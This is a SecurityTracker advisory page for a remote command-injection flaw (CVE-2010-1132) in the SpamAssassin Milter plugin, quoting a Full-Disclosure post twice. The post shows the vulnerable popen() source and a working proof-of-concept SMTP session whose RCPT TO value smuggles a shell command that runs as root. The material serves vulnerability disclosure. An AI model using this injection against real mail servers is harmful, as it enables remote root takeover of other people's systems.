Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
|
|
|
|
|
|
|
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
|
|
|
|
Become a Partner and License Our Database or Notification Service
|
|
|
|
|
|
|
|
|
|
|
|
|
SpamAssassin Milter Plugin Input Validation Flaw Lets Remote Users Execute Arbitrary Code
|
|
SecurityTracker Alert ID: 1023691 |
|
SecurityTracker URL: http://securitytracker.com/id/1023691
|
|
CVE Reference:
CVE-2010-1132
(Links to External Site)
|
Updated: Mar 31 2010
|
Original Entry Date: Mar 8 2010
|
Impact:
Execution of arbitrary code via network, Root access via network
|
Exploit Included: Yes
|
Version(s): 0.3.1; possibly earlier versions
|
Description:
A vulnerability was reported in SpamAssassin Milter Plugin. A remote user can execute arbitrary code on the target system.
When the software is invoked with the expand (-x) flag, the software makes an unsafe popen() call. A remote user can send a specially crafted RCPT TO value to execute arbitrary code on the target system. The code will run with the privileges of the target service.
Kingcope reported this vulnerability.
|
Impact:
A remote user can execute arbitrary code on the target system.
|
Solution:
No solution was available at the time of this entry.
|
Vendor URL: savannah.nongnu.org/projects/spamass-milt/ (Links to External Site)
|
Cause:
Input validation error
|
Underlying OS:
Linux (Any), UNIX (Any)
|
|
Message History:
None.
|
Source Message Contents
|
Date: Sun, 07 Mar 2010 20:17:14 +0100
Subject: [Full-disclosure] Spamassassin Milter Plugin Remote Root
|
--===============2040623599==
Content-Type: multipart/alternative; boundary="=-txLfaugnO9ZsZKEBVTeh"
--=-txLfaugnO9ZsZKEBVTeh
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 7bit
Spamassassin Milter Plugin Remote Root Zeroday (BTW zerodays lurk in the
shadows not HERE)
aka the postfix_joker advisory
Logic fuckup?
March 07 2010 // if you read this 10 years later you are definetly
seeking the nice 0days!
Greetz fly out to alex,andi,adize :D
+++ KEEP IT ULTRA PRIV8 +++
Software
+-+-+-+-+
Apache Spamassassin
SpamAssassin is a mail filter which attempts to identify spam using
a variety of mechanisms including text analysis, Bayesian filtering,
DNS blocklists, and collaborative filtering databases.
SpamAssassin is a project of the Apache Software Foundation (ASF).
Postfix
What is Postfix? It is Wietse Venema's mailer that started life at IBM
research as an alternative to the widely-used Sendmail program.
Postfix attempts to be fast, easy to administer, and secure.
The outside has a definite Sendmail-ish flavor, but the inside is
completely different.
Spamassassin Milter
A little plugin for the Sendmail Milter (Mail Filter) library
that pipes all incoming mail (including things received by rmail/UUCP)
through the SpamAssassin, a highly customizable SpamFilter.
Remote Code Execution Vulnerability
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
The Spamassassin Milter Plugin can be tricked into executing any command
as the root user remotely.
If spamass-milter is run with the expand flag (-x option) it runs a
popen() including the attacker supplied
recipient (RCPT TO).
>From spamass-milter-0.3.1 (-latest) Line 820:
//
// Gets called once for each recipient
//
// stores the first recipient in the spamassassin object and
// stores all addresses and the number thereof (some redundancy)
//
sfsistat
mlfi_envrcpt(SMFICTX* ctx, char** envrcpt)
{
struct context *sctx = (struct context*)smfi_getpriv(ctx);
SpamAssassin* assassin = sctx->assassin;
FILE *p;
#if defined(__FreeBSD__)
int rv;
#endif
debug(D_FUNC, "mlfi_envrcpt: enter");
if (flag_expand)
{
/* open a pipe to sendmail so we can do address
expansion */
char buf[1024];
char *fmt="%s -bv \"%s\" 2>&1";
#if defined(HAVE_SNPRINTF)
snprintf(buf, sizeof(buf)-1, fmt, SENDMAIL, envrcpt[0]);
#else
/* XXX possible buffer overflow here // is this a
joke ?! */
sprintf(buf, fmt, SENDMAIL, envrcpt[0]);
#endif
debug(D_RCPT, "calling %s", buf);
#if defined(__FreeBSD__) /* popen bug - see PR bin/50770 */
rv = pthread_mutex_lock(&popen_mutex);
if (rv)
{
debug(D_ALWAYS, "Could not lock popen mutex: %
s", strerror(rv));
abort();
}
#endif
p = popen(buf, "r"); [1]
if (!p)
{
debug(D_RCPT, "popen failed(%s). Will not
expand aliases", strerror(errno));
assassin->expandedrcpt.push_back(envrcpt[0]);
[1] the vulnerable popen() call.
Remote Root Exploit PoC through postfix
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
$ nc localhost 25
220 ownthabox ESMTP Postfix (Ubuntu)
mail from: me@me.com
250 2.1.0 Ok
rcpt to: root+:"|touch /tmp/foo"
250 2.1.5 Ok
$ ls -la /tmp/foo
-rw-r--r-- 1 root root 0 2010-03-07 19:46 /tmp/foo
Signed,
Kingcope
--=-txLfaugnO9ZsZKEBVTeh
Content-Type: text/html; charset="utf-8"
Content-Transfer-Encoding: 7bit
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 TRANSITIONAL//EN">
<HTML>
<HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=UTF-8">
<META NAME="GENERATOR" CONTENT="GtkHTML/3.28.1">
</HEAD>
<BODY>
Spamassassin Milter Plugin Remote Root Zeroday (BTW zerodays lurk in the shadows not HERE)<BR>
aka the postfix_joker advisory<BR>
<BR>
Logic fuckup?<BR>
<BR>
March 07 2010 // if you read this 10 years later you are definetly<BR>
seeking the nice 0days!<BR>
<BR>
Greetz fly out to alex,andi,adize :D<BR>
+++ KEEP IT ULTRA PRIV8 +++<BR>
<BR>
Software<BR>
+-+-+-+-+<BR>
Apache Spamassassin<BR>
SpamAssassin is a mail filter which attempts to identify spam using<BR>
a variety of mechanisms including text analysis, Bayesian filtering,<BR>
DNS blocklists, and collaborative filtering databases.<BR>
<BR>
SpamAssassin is a project of the Apache Software Foundation (ASF).<BR>
<BR>
Postfix<BR>
What is Postfix? It is Wietse Venema's mailer that started life at IBM<BR>
research as an alternative to the widely-used Sendmail program.<BR>
Postfix attempts to be fast, easy to administer, and secure.<BR>
The outside has a definite Sendmail-ish flavor, but the inside is completely different.<BR>
<BR>
Spamassassin Milter<BR>
A little plugin for the Sendmail Milter (Mail Filter) library<BR>
that pipes all incoming mail (including things received by rmail/UUCP)<BR>
through the SpamAssassin, a highly customizable SpamFilter.<BR>
<BR>
Remote Code Execution Vulnerability<BR>
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+<BR>
<BR>
The Spamassassin Milter Plugin can be tricked into executing any command as the root user remotely.<BR>
If spamass-milter is run with the expand flag (-x option) it runs a popen() including the attacker supplied <BR>
recipient (RCPT TO).<BR>
<BR>
>From spamass-milter-0.3.1 (-latest) Line 820:<BR>
<BR>
//<BR>
// Gets called once for each recipient<BR>
//<BR>
// stores the first recipient in the spamassassin object and<BR>
// stores all addresses and the number thereof (some redundancy)<BR>
//<BR>
<BR>
sfsistat<BR>
mlfi_envrcpt(SMFICTX* ctx, char** envrcpt)<BR>
{<BR>
struct context *sctx = (struct context*)smfi_getpriv(ctx);<BR>
SpamAssassin* assassin = sctx->assassin;<BR>
FILE *p;<BR>
#if defined(__FreeBSD__)<BR>
int rv;<BR>
#endif<BR>
<BR>
debug(D_FUNC, "mlfi_envrcpt: enter");<BR>
<BR>
if (flag_expand)<BR>
{<BR>
/* open a pipe to sendmail so we can do address expansion */<BR>
<BR>
char buf[1024];<BR>
char *fmt="%s -bv \"%s\" 2>&1";<BR>
<BR>
#if defined(HAVE_SNPRINTF)<BR>
snprintf(buf, sizeof(buf)-1, fmt, SENDMAIL, envrcpt[0]);<BR>
#else<BR>
/* XXX possible buffer overflow here // is this a joke ?! */<BR>
sprintf(buf, fmt, SENDMAIL, envrcpt[0]);<BR>
#endif<BR>
<BR>
debug(D_RCPT, "calling %s", buf);<BR>
<BR>
#if defined(__FreeBSD__) /* popen bug - see PR bin/50770 */<BR>
rv = pthread_mutex_lock(&popen_mutex);<BR>
if (rv)<BR>
{<BR>
debug(D_ALWAYS, "Could not lock popen mutex: %s", strerror(rv));<BR>
abort();<BR>
}<BR>
#endif<BR>
<BR>
p = popen(buf, "r"); [1]<BR>
if (!p)<BR>
{<BR>
debug(D_RCPT, "popen failed(%s). Will not expand aliases", strerror(errno));<BR>
assassin->expandedrcpt.push_back(envrcpt[0]);<BR>
<BR>
<BR>
[1] the vulnerable popen() call.<BR>
<BR>
Remote Root Exploit PoC through postfix<BR>
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+<BR>
<BR>
$ nc localhost 25<BR>
220 ownthabox ESMTP Postfix (Ubuntu)<BR>
mail from: <A HREF="mailto:me@me.com">me@me.com</A><BR>
250 2.1.0 Ok<BR>
rcpt to: root+:"|touch /tmp/foo"<BR>
250 2.1.5 Ok<BR>
<BR>
$ ls -la /tmp/foo<BR>
-rw-r--r-- 1 root root 0 2010-03-07 19:46 /tmp/foo<BR>
<BR>
Signed,<BR>
<BR>
Kingcope
</BODY>
</HTML>
--=-txLfaugnO9ZsZKEBVTeh--
--===============2040623599==
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
--===============2040623599==--
|
|
Go to the Top of This SecurityTracker Archive Page
|
